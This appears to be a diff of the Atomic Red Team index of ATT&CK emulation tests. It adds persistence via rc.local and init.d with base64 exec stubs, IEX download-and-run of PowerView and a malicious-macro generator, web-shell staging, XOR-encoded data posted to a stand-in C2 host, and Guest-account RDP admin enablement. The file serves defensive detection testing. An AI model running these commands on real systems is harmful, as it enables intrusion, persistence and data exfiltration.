+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.common
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMuY29tbW9uID4gL3RtcC9UMTAzNy4wMDQucmMuY29tbW9uJykK'))\"" | sudo tee -a /etc/rc.common
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.common
+          sudo chmod +x /etc/rc.common
+        cleanup_command: 'origfilename=''/etc/rc.common.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.common;else sudo cp $origfilename /etc/rc.common
+          && sudo rm $origfilename;fi
+
+'
+    - name: rc.local
+      auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102
+      description: 'Modify rc.local
+
+'
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: true
+        command: |
+          filename='/etc/rc.local';if [ ! -f $filename ];then sudo touch $filename;else sudo cp $filename /etc/rc.local.original;fi
+          printf '%s\n' '#!/bin/bash' | sudo tee /etc/rc.local
+          echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgcmMubG9jYWwgPiAvdG1wL1QxMDM3LjAwNC5yYy5sb2NhbCcpCgo='))\"" | sudo tee -a /etc/rc.local
+          printf '%s\n' 'exit 0' | sudo tee -a /etc/rc.local
+          sudo chmod +x /etc/rc.local
+        cleanup_command: 'origfilename=''/etc/rc.local.original'';if [ ! -f $origfilename
+          ];then sudo rm /etc/rc.local;else sudo cp $origfilename /etc/rc.local &&
+          sudo rm $origfilename;fi
+
+'
  T1542.004:
    technique:
      created: '2020-10-20T00:05:48.790Z'
@@ -43797,7 +44719,8 @@ persistence:

 '
      executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
          -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
          -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
        name: powershell
@@ -44715,6 +45638,48 @@ persistence:
          rm -rf #{systemd_service_path}/#{systemd_service_file}
          systemctl daemon-reload
        name: bash
+    - name: Create Systemd Service file,  Enable the service , Modify and Reload the
+        service.
+      auto_generated_guid: c35ac4a8-19de-43af-b9f8-755da7e89c89
+      description: "This test creates a systemd service unit file and enables it to
+        autostart on boot. Once service is created and enabled, it also modifies this
+        same service file showcasing both Creation and Modification of system process.
+        \n"
+      supported_platforms:
+      - linux
+      dependencies:
+      - description: 'System must be Ubuntu ,Kali OR CentOS.
+
+'
+        prereq_command: 'if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat
+          /etc/os-release | grep -i ID=kali) ] || [ $(cat /etc/os-release | grep -i
+          ''ID="centos"'') ]; then exit /b 0; else exit /b 1; fi;
+
+'
+        get_prereq_command: 'echo Please run from Ubuntu ,Kali OR CentOS.
+
+'
+      executor:
+        name: bash
+        elevation_required: true
+        command: "cat > /etc/init.d/T1543.002 << EOF\n#!/bin/bash\n### BEGIN INIT
+          INFO\n# Provides : Atomic Test T1543.002\n# Required-Start: $all\n# Required-Stop
+          : \n# Default-Start: 2 3 4 5\n# Default-Stop: \n# Short Description: Atomic
+          Test for Systemd Service Creation\n### END INIT INFO\npython3 -c \"import
+          os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK'))\"\nEOF\n\nchmod
+          +x /etc/init.d/T1543.002\nif [ $(cat /etc/os-release | grep -i ID=ubuntu)
+          ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002
+          defaults; elif [ $(cat /etc/os-release | grep -i 'ID=\"centos\"') ]; then
+          chkconfig T1543.002 on ; else echo \"Please run this test on Ubnutu , kali
+          OR centos\" ; fi ;\nsystemctl enable T1543.002\nsystemctl start T1543.002\n\necho
+          \"python3 -c \\\"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\\\"\"
+          | sudo tee -a /etc/init.d/T1543.002\nsystemctl daemon-reload\nsystemctl
+          restart T1543.002\n"
+        cleanup_command: |
+          systemctl stop T1543.002
+          systemctl disable T1543.002
+          rm -rf /etc/init.d/T1543.002
+          systemctl daemon-reload
  T1053.006:
    technique:
      id: attack-pattern--a542bac9-7bc1-4da7-9a09-96f69e23cc21
@@ -45554,15 +46519,16 @@ persistence:
        get_prereq_command: |
          New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
-          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
      executor:
-        command: 'xcopy #{web_shells} #{web_shell_path}
-
-'
-        cleanup_command: 'del #{web_shell_path} /q >nul 2>&1
+        command: 'xcopy /I /Y #{web_shells} #{web_shell_path}

 '
+        cleanup_command: |
+          del #{web_shell_path}\b.jsp /q >nul 2>&1
+          del #{web_shell_path}\tests.jsp /q >nul 2>&1
+          del #{web_shell_path}\cmd.aspx /q >nul 2>&1
        name: command_prompt
  T1546.003:
    technique:
@@ -46732,6 +47698,21 @@ impact:
        cleanup_command: |
          $which_openssl rsautl -decrypt -inkey #{private_key_path} -in #{encrypted_file_path}
          rm #{encrypted_file_path}
+    - name: PureLocker Ransom Note
+      auto_generated_guid: 649349c7-9abf-493b-a7a2-b1aa4d141528
+      description: "building the IOC (YOUR_FILES.txt) for the PureLocker ransomware
+        \nhttps://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: 'echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt
+
+'
+        cleanup_command: 'del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1
+
+'
  T1565:
    technique:
      external_references:
@@ -49382,6 +50363,49 @@ discovery:

 '
        name: command_prompt
+    - name: Enumerate Active Directory for Unconstrained Delegation
+      auto_generated_guid: 46f8dbe9-22a5-4770-8513-66119c5be63b
+      description: |
+        Attackers may attempt to query for computer objects with the UserAccountControl property
+        'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
+        More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
+        Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
+      supported_platforms:
+      - windows
+      input_arguments:
+        domain:
+          description: Domain FQDN
+          type: String
+          default: contoso.com
+        uac_prop:
+          description: UAC Property to search
+          type: String
+          default: 524288
+      dependencies:
+      - description: 'PowerShell ActiveDirectory Module must be installed
+
+'
+        prereq_command: |
+          Try {
+              Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
+              exit 0
+          }
+          Catch {
+              exit 1
+          }
+        get_prereq_command: |
+          if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
+            Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
+          } else {
+            Install-WindowsFeature RSAT-AD-PowerShell
+          }
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-ADObject -LDAPFilter ''(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})''
+          -Server #{domain}
+
+'
  T1069.002:
    technique:
      external_references:
@@ -49475,10 +50499,9 @@ discovery:
      supported_platforms:
      - windows
      executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-LocalAdminAccess -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose
        name: powershell
    - name: Find local admins on all machines in domain (PowerView)
      auto_generated_guid: a5f0d9f8-d3c9-46c0-8378-846ddd6b1cbd
@@ -49490,10 +50513,9 @@ discovery:
      supported_platforms:
      - windows
      executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin  -Verbose
        name: powershell
    - name: Find Local Admins via Group Policy (PowerView)
      auto_generated_guid: 64fdb43b-5259-467a-b000-1b02c00e510a
@@ -49509,9 +50531,9 @@ discovery:
          type: Path
          default: "$env:COMPUTERNAME"
      executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name}
-          -Verbose'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"
        name: powershell
    - name: Enumerate Users Not Requiring Pre Auth (ASRepRoast)
      auto_generated_guid: 870ba71e-6858-4f6d-895c-bb6237f6121b
@@ -49571,10 +50593,9 @@ discovery:
        prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}

 '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-'
+        get_prereq_command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
      executor:
        command: "#{adfind_path} -f (objectcategory=group)\n"
        name: command_prompt
@@ -50603,7 +51624,7 @@ discovery:

 '
        name: bash
-        elevation_require: true
+        elevation_required: true
    - name: Network Share Discovery command prompt
      auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb
      description: |
@@ -50653,11 +51674,22 @@ discovery:
 '
      supported_platforms:
      - windows
-      executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Endpoint must be joined to domain

 '
+        prereq_command: 'if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain)
+          {exit 0} else {exit 1}
+
+'
+        get_prereq_command: '"Join system to domain"
+
+'
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose
        name: powershell
  T1040:
    technique:
@@ -52149,7 +53181,7 @@ discovery:
        vbscript:
          description: Path to sample script
          type: String
-          default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs
+          default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
      executor:
        command: 'cscript #{vbscript}'
        name: powershell
@@ -52720,10 +53752,9 @@ discovery:
      supported_platforms:
      - windows
      executor:
-        command: 'IEX (IWR ''https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1''
-          -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
-
-'
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
        name: powershell
  T1007:
    technique:
@@ -57990,7 +59021,8 @@ execution:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
        cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
@@ -58051,7 +59083,8 @@ execution:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
          Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
        name: powershell
@@ -58089,7 +59122,8 @@ execution:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
        name: powershell
@@ -58126,7 +59160,8 @@ execution:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "   Open `"#{bat_path}`" For Output As #1`n   Write #1, `"calc.exe`"`n   Close #1`n   a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
        name: powershell
@@ -58260,7 +59295,8 @@ execution:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome"
        name: powershell
    - name: Potentially Unwanted Applications (PUA)
@@ -59479,7 +60515,8 @@ execution:

 '
      executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
          -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\"
          -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n"
        name: powershell
@@ -59888,7 +60925,41 @@ execution:
      x_mitre_remote_support: true
      x_mitre_contributors:
      - Shane Tully, @securitygypsy
-    atomic_tests: []
+      identifier: T1072
+    atomic_tests:
+    - name: Radmin Viewer Utility
+      auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+      description: 'An adversary may use Radmin Viewer Utility to remotely control
+        Windows device, this will start the radmin console.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        radmin_installer:
+          description: Radmin Viewer installer
+          type: Path
+          default: "%TEMP%\\RadminViewer.msi"
+        radmin_exe:
+          description: The radmin.exe executable from RadminViewer.msi
+          type: Path
+          default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
+      dependencies:
+      - description: 'Radmin Viewer Utility must be installed at specified location
+          (#{radmin_exe})
+
+'
+        prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
+
+'
+        get_prereq_command: |
+          echo Downloading radmin installer
+          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+          msiexec /i "#{radmin_installer}" /qn
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '"#{radmin_exe}"'
  T1153:
    technique:
      id: attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0
@@ -60358,7 +61429,8 @@ execution:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
        cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
          -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
@@ -60395,7 +61467,8 @@ execution:

 '
      executor:
-        command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\"
+        command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
+          (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
          -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\"
          -officeProduct \"Word\" -sub \"Extract\"\n"
        cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
@@ -62240,7 +63313,41 @@ lateral-movement:
      x_mitre_remote_support: true
      x_mitre_contributors:
      - Shane Tully, @securitygypsy
-    atomic_tests: []
+      identifier: T1072
+    atomic_tests:
+    - name: Radmin Viewer Utility
+      auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129
+      description: 'An adversary may use Radmin Viewer Utility to remotely control
+        Windows device, this will start the radmin console.
+
+'
+      supported_platforms:
+      - windows
+      input_arguments:
+        radmin_installer:
+          description: Radmin Viewer installer
+          type: Path
+          default: "%TEMP%\\RadminViewer.msi"
+        radmin_exe:
+          description: The radmin.exe executable from RadminViewer.msi
+          type: Path
+          default: "%PROGRAMFILES(x86)%/Radmin Viewer 3/Radmin.exe"
+      dependencies:
+      - description: 'Radmin Viewer Utility must be installed at specified location
+          (#{radmin_exe})
+
+'
+        prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
+
+'
+        get_prereq_command: |
+          echo Downloading radmin installer
+          bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
+          msiexec /i "#{radmin_installer}" /qn
+      executor:
+        name: command_prompt
+        elevation_required: true
+        command: '"#{radmin_exe}"'
  T1080:
    technique:
      id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
@@ -64065,6 +65172,55 @@ command-and-control:
          del #{local_path} >nul 2>&1
          del %temp%\MpCmdRun.log >nul 2>&1
        name: command_prompt
+    - name: whois file download
+      auto_generated_guid: c99a829f-0bb8-4187-b2c6-d47d1df74cab
+      description: 'Download a remote file using the whois utility
+
+'
+      supported_platforms:
+      - linux
+      - macos
+      input_arguments:
+        remote_host:
+          description: Remote hostname or IP address
+          type: String
+          default: localhost
+        remote_port:
+          description: Remote port to connect to
+          type: Integer
+          default: 8443
+        output_file:
+          description: Path of file to save output to
+          type: Path
+          default: "/tmp/T1105.whois.out"
+        query:
+          description: Query to send to remote server
+          type: String
+          default: Hello from Atomic Red Team test T1105
+        timeout:
+          description: Timeout period before ending process (seconds)
+          type: Integer
+          default: 1
+      dependencies:
+      - description: 'The whois and timeout commands must be present
+
+'
+        prereq_command: 'which whois && which timeout
+
+'
+        get_prereq_command: 'echo "Please install timeout and the whois package"
+
+'
+      executor:
+        name: sh
+        elevation_required: false
+        command: 'timeout --preserve-status #{timeout} whois -h #{remote_host} -p
+          #{remote_port} "#{query}" > #{output_file}
+
+'
+        cleanup_command: 'rm -f #{output_file}
+
+'
  T1090.001:
    technique:
      external_references:
@@ -65162,6 +66318,38 @@ command-and-control:
          echo -n 111-11-1111 | base64
          curl -XPOST #{base64_data}.#{destination_url}
        name: sh
+    - name: XOR Encoded data.
+      auto_generated_guid: c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08
+      description: |
+        XOR encodes the data with a XOR key.
+        Reference - https://gist.github.com/loadenmb/8254cee0f0287b896a05dcdc8a30042f
+      supported_platforms:
+      - windows
+      input_arguments:
+        destination_url:
+          description: Destination URL to post encoded data.
+          type: string
+          default: example.com
+        plaintext:
+          description: Plain text mimicking victim data sent to C2 server.
+          type: string
+          default: Path\n----\nC:\Users\victim
+        key:
+          description: XOR key used for encoding the plaintext.
+          type: string
+          default: abcdefghijklmnopqrstuvwxyz123456
+      executor:
+        command: |
+          $plaintext = ([system.Text.Encoding]::UTF8.getBytes("#{plaintext}"))
+          $key = "#{key}"
+          $cyphertext =  @();
+          for ($i = 0; $i -lt $plaintext.Count; $i++) {
+           $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length];
+          }
+          $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)
+          [System.Net.ServicePointManager]::Expect100Continue = $false
+          Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $cyphertext -DisableKeepAlive
+        name: powershell
  T1001.002:
    technique:
      external_references:
@@ -66760,9 +67948,9 @@ initial-access:
    atomic_tests:
    - name: Enable Guest account with RDP capability and admin priviliges
      auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0
-      description: After execution the Default Guest account will be enabled (Active)
-        and added to Administrators and Remote Desktop Users Group, and desktop will
-        allow multiple RDP connections
+      description: |
+        After execution the Default Guest account will be enabled (Active) and added to Administrators and Remote Desktop Users Group,
+        and desktop will allow multiple RDP connections.
      supported_platforms:
      - windows
      input_arguments:
@@ -66774,6 +67962,10 @@ initial-access:
          description: Specify the guest password
          type: String
          default: Password123!
+        remove_rdp_access_during_cleanup:
+          description: Set to 1 if you want the cleanup to remove RDP access to machine
+          type: Integer
+          default: 0
      executor:
        command: |-
          net user #{guest_user} /active:yes
@@ -66786,8 +67978,9 @@ initial-access:
          net user #{guest_user} /active:no >nul 2>&1
          net localgroup administrators #{guest_user} /delete >nul 2>&1
          net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1
-          reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1
+          if #{remove_rdp_access_during_cleanup} NEQ 1 (echo Note: set remove_rdp_access_during_cleanup input argument to disable RDP access during cleanup)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1)
+          if #{remove_rdp_access_during_cleanup} EQU 1 (reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1)
        name: command_prompt
        elevation_required: true
  T1078.002:
@@ -67454,6 +68647,7 @@ initial-access:
      description: |
        The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
        The below will successfully download the macro-enabled Excel file to the current location.
+        File is downloaded to the %temp% folder.
      supported_platforms:
      - windows
      executor:
@@ -67462,13 +68656,13 @@ initial-access:
            return 'Please install Microsoft Excel before running this test.'
          }
          else{
-            $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
+            $url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'
            $fileName = 'PhishingAttachment.xlsm'
            New-Item -Type File -Force -Path $fileName | out-null
            $wc = New-Object System.Net.WebClient
            $wc.Encoding = [System.Text.Encoding]::UTF8
            [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-            ($wc.DownloadString("$url")) | Out-File $fileName
+            Invoke-WebRequest -Uri $url -OutFile $fileName
          }
        name: powershell
    - name: Word spawned a command shell and used an IP address in the command line
@@ -67507,7 +68701,8 @@ initial-access:
 '
      executor:
        command: |
-          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing)
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
          $macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"ping 8.8.8.8`"`n"
          Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
        cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
@@ -65,10 +65,14 @@ If you see a message saying \"wce.exe is not recognized as an internal or extern
 **Supported Platforms:** Windows


+**auto_generated_guid:** 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
+
+
+


 #### Inputs:
-| Name | Description | Type | Default Value | 
+| Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | output_file | Path where resulting data should be placed | Path | %temp%&#92;wce-output.txt|
 | wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
@@ -94,11 +98,12 @@ del "#{output_file}" >nul 2>&1
 ##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
 ##### Check Prereq Commands:
 ```powershell
-if (Test-Path #{wce_exe}) {exit 0} else {exit 1} 
+if (Test-Path #{wce_exe}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
 $parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
